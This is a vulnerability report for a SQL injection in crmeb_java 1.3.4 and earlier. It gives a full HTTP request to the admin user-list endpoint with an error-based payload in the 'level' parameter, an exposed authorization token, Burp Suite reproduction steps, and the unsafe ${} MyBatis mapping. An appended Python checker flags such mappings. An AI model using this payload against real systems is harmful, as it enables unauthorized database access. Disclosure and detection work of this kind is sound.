[Suggested description]
A SQL injection vulnerability exists in crmeb_java <=1.3.4.
The unfiltered parameter 'level' of the /api/admin/user/list endpoint causes SQLi.
[Vulnerability Type]
SQLi
[Vendor of Product]
https://github.com/crmeb/crmeb_java
[Affected Product Code Base]
<=1.3.4
[Affected Component]
GET /api/admin/user/list?labelId=&userType=routine&sex=&isPromoter=&country=&payCount=9&accessType=0&dateLimit=&keywords=&province=&city=&page=1&limit=15&level=1+and+extractvalue(1,CONCAT(1,user()))&groupId=1&temp=1675070029&addres=a% HTTP/2
Host: api.java.crmeb.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authori-Zation: 0d8ed99c6e51404f82a22ba15332300a
Origin: https://admin.java.crmeb.net
Referer: https://admin.java.crmeb.net/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Te: trailers
[Attack Type]
Remote
[Vulnerability details]
Step 1: log in as admin, click User Manager, and click the search button.
Step 2: intercept the request using Burp Suite.
Step 3: insert the payload in the parameter “level”.
level=1+and+extractvalue(1,CONCAT(1,user()))
https://api.java.crmeb.net/api/admin/user/list?labelId=&userType=routine&sex=&isPromoter=&country=&payCount=9&accessType=0&dateLimit=&keywords=&province=&city=&page=1&limit=15&level=1+and+extractvalue(1,CONCAT(1,user()))&groupId=1&temp=1675070029&addres=a%
there you can see it
[Impact Code execution]
true
[Cause of vulnerability]
\crmeb\crmeb-service\src\main\resources\mapper\user\UserMapper.xml
line 36 "${level}"
When "${}" is used, the program does not do any processing and directly splices the value into the SQL statement, leading to SQLi.
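The "${}" versus "#{}" difference described above, as an added example that is not part of the original report or the project's code: a Python check that lists every raw "${...}" substitution in a MyBatis mapper so it can be reviewed or replaced with a bound "#{...}" parameter. The sample mapper, its statement id, table and column names are constructed and are not the contents of UserMapper.xml.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample mapper (NOT the project's UserMapper.xml); the statement
# id, table and column names are hypothetical.
VULNERABLE = """<mapper namespace="example.UserDao">
  <select id="findList" resultType="map">
    SELECT * FROM user u
    <where>
      <if test="level != null and level != ''">
        AND u.level = ${level}
      </if>
      <if test="keywords != null">
        AND u.nickname LIKE CONCAT('%', #{keywords}, '%')
      </if>
    </where>
  </select>
</mapper>"""

# With "#{}" MyBatis sends the value as a prepared-statement parameter
# instead of splicing it into the SQL text.
FIXED = VULNERABLE.replace("${level}", "#{level}")

STATEMENT_TAGS = {"select", "insert", "update", "delete", "sql"}
RAW_SUBSTITUTION = re.compile(r"\$\{\s*([^}]+?)\s*\}")


def find_raw_substitutions(mapper_xml):
    """Return (statement id, expression) for each ${...} in the mapper's SQL."""
    findings = []
    for stmt in ET.fromstring(mapper_xml).iter():
        if stmt.tag not in STATEMENT_TAGS:
            continue
        # itertext() also covers text nested in <where>, <if>, <foreach>, ...
        sql = "".join(stmt.itertext())
        for match in RAW_SUBSTITUTION.finditer(sql):
            findings.append((stmt.get("id"), match.group(1)))
    return findings


if __name__ == "__main__":
    for name, xml in (("vulnerable", VULNERABLE), ("fixed", FIXED)):
        print(name, find_raw_substitutions(xml))
```

A finding is a review item, not proof of injection: "${}" is sometimes used for values that cannot be bound, and those need an allow-list on the server side.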